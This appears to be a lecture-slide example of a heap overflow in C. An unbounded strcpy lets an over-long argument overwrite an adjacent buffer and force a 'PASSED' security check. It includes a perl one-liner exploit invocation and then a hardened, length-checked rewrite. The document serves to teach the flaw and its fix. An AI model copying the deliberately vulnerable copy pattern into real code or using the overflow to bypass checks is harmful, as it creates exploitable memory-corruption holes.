Heap Overflow – Simple Example
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
    if (argc < 2) return 1;

    char *buf1 = malloc(20);
    char *buf2 = malloc(10);

    // Unbounded copy: an argv[1] longer than buf1 runs into the adjacent heap chunk (buf2)
    strcpy(buf1, argv[1]);

    // perform security check and store the results in buf2
    // (buf2 is freshly malloc'd here, so strlen(buf2) reads uninitialised memory
    //  unless the overflow above has already filled it)
    while (strlen(buf2) < 1) {
        /* .... check body elided on the slide .... */
    } // end of while security check loop

    if (strcmp(buf2, "PASSED") != 0)   // exit unless the check passed
        exit(0);
    else {  // continue doing stuff only if we passed
            // security check
    }
    return 0;
}
Example invocation (overflows buf1 so that "PASSED" lands in buf2):

./bad_heap_example `perl -e 'print "A"x28'`PASSED
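A hardened rewrite of the slide's flow, added here as an example (not the slide's own code): the unbounded strcpy is replaced by a length-checked copy that rejects anything that does not fit in buf1, buf2 is zero-initialised and written only through a bounded snprintf, and the check body the slide elides is a hypothetical alphanumeric-only policy assumed for this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF1_SIZE 20
#define BUF2_SIZE 10

/* Bounded replacement for the slide's strcpy(buf1, argv[1]): returns 0 if the
 * input plus terminator fits in buf1, -1 if rejected (nothing is written). */
int copy_input_safely(char *buf1, size_t buf1_size, const char *input) {
    size_t n = 0;
    if (input == NULL) return -1;
    while (n < buf1_size && input[n] != '\0') n++;
    if (n == buf1_size) return -1;      /* no room for the NUL terminator */
    memcpy(buf1, input, n + 1);
    return 0;
}

/* Placeholder policy (assumed here; the slide elides the real check): passes
 * only non-empty, purely alphanumeric input. Result written via bounded snprintf. */
static void security_check(const char *input, char *buf2, size_t buf2_size) {
    int ok = (input[0] != '\0');
    for (const char *p = input; ok && *p != '\0'; p++)
        if (!isalnum((unsigned char)*p)) ok = 0;
    snprintf(buf2, buf2_size, "%s", ok ? "PASSED" : "FAILED");
}

/* Hardened equivalent of the slide's flow: 1 = accepted, 0 = rejected (input
 * did not fit in buf1, or the check failed). buf2 can only be set by the check. */
int hardened_check(const char *input) {
    char *buf1 = malloc(BUF1_SIZE);
    char *buf2 = calloc(BUF2_SIZE, 1);  /* zero-filled, so buf2 is never read uninitialised */
    int passed = 0;
    if (buf1 && buf2 && copy_input_safely(buf1, BUF1_SIZE, input) == 0) {
        security_check(buf1, buf2, BUF2_SIZE);
        passed = (strcmp(buf2, "PASSED") == 0);
    }
    free(buf1);
    free(buf2);
    return passed;
}

int main(int argc, char *argv[]) {
    /* Same invocation as the slide: the 34-byte argument is now rejected. */
    printf("%s\n", hardened_check(argc > 1 ? argv[1] : "") ? "accepted" : "rejected");
    return 0;
}
```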